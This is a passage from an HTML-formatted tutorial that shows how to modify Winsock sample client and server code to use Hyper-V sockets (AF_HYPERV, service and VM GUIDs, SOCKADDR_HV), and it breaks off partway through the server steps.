<span style="background-color: transparent; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………………………</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">wchar_t</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">* clsid_str = </span><span style="background-color: transparent; color: #a31515; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">L"{a42e7cda-d03f-480c-9cc2-a4de20abb878}"</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">; </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// HV_PARENT_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSIDFromString(clsid_str, &VmID);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clsid_str = </span><span style="background-color: transparent; color: #a31515; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">L"{b1d00d3e-fe10-4570-ad62-7648779d7a1b}"</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSIDFromString(clsid_str, &ServiceID); </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//GUID of Service, generated by powershell</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//configure protocol</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ZeroMemory</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(&clientService, </span><span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">sizeof</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(clientService));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clientService.Family = </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AF_HYPERV</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clientService.VmId </span><span style="background-color: transparent; color: teal; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> *vmId;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clientService.ServiceId </span><span style="background-color: transparent; color: teal; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> *serviceId;</span></div>
<br />
<ol start="3" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Change protocol parameters:</span></div>
</li>
</ol>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_family = </span><span style="background-color: transparent; color: #6f008a; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AF_HYPERV</span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_socktype = </span><span style="background-color: transparent; color: #6f008a; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SOCK_STREAM</span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_protocol = </span><span style="background-color: transparent; color: #6f008a; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PROTOCOL_RAW</span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<ol start="4" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Comment out the getaddrinfo block.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Replace the socket creation line:</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol); old code</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ConnectSocket = socket(hints.ai_family, hints.ai_socktype, hints.ai_protocol);</span></div>
<ol start="6" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Comment out the Stop() function and its calls.</span></div>
</li>
</ol>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Server code:</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Add GUIDs:</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DEFINE_GUID</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(HV_GUID_PARENT, 0xa42e7cda, 0xd03f, 0x480c, 0x9c, 0xc2, 0xa4, 0xde, 0x20, 0xab, 0xb8, 0x78); </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// a42e7cda-d03f-480c-9cc2-a4de20abb878: DEFINE_GUID takes exactly 11 values (1 x 32-bit, 2 x 16-bit, 8 bytes)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DEFINE_GUID</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(HV_GUID_ZERO, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0); </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// 00000000-0000-0000-0000-000000000000 (wildcard VmId)</span></div>
<ol start="2" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Initialize GUIDs:</span></div>
</li>
</ol>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSID ServiceID;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">wchar_t</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">* clsid_str = </span><span style="background-color: transparent; color: #a31515; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">L"{b1d00d3e-fe10-4570-ad62-7648779d7a1b}"</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSIDFromString(clsid_str, &ServiceID); </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//GUID of Service, generated by powershell</span></div>
<ol start="3" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Change protocol parameters</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ZeroMemory</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(&clientService, </span><span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">sizeof</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(clientService));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clientService.Family = </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AF_HYPERV</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clientService.VmId </span><span style="background-color: transparent; color: teal; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HV_GUID_ZERO;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clientService.ServiceId </span><span style="background-color: transparent; color: teal; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> *serviceId;</span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ZeroMemory</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(&hints, </span><span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">sizeof</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(hints));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_family = </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AF_HYPERV</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// Hyper-V socket address family instead of the sample's AF_UNSPEC (no IPv4/IPv6 involved)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_socktype = </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SOCK_STREAM</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// Stream socket over the Hyper-V transport (VMBus), not TCP</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_protocol = </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PROTOCOL_RAW</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_addrlen = </span><span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">sizeof</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SOCKADDR_HV</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_addr = </span><span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">reinterpret_cast</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><</span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SOCKADDR</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> *>(&clientService);</span></div>
<ol start="4" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Replace code</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//ListenSocket = socket(result->ai_family, result->ai_socktype, result->ai_protocol); - orig.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ListenSocket = socket(hints.ai_family, hints.ai_socktype, hints.ai_protocol);</span></div>
<br />
<ol start="5" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
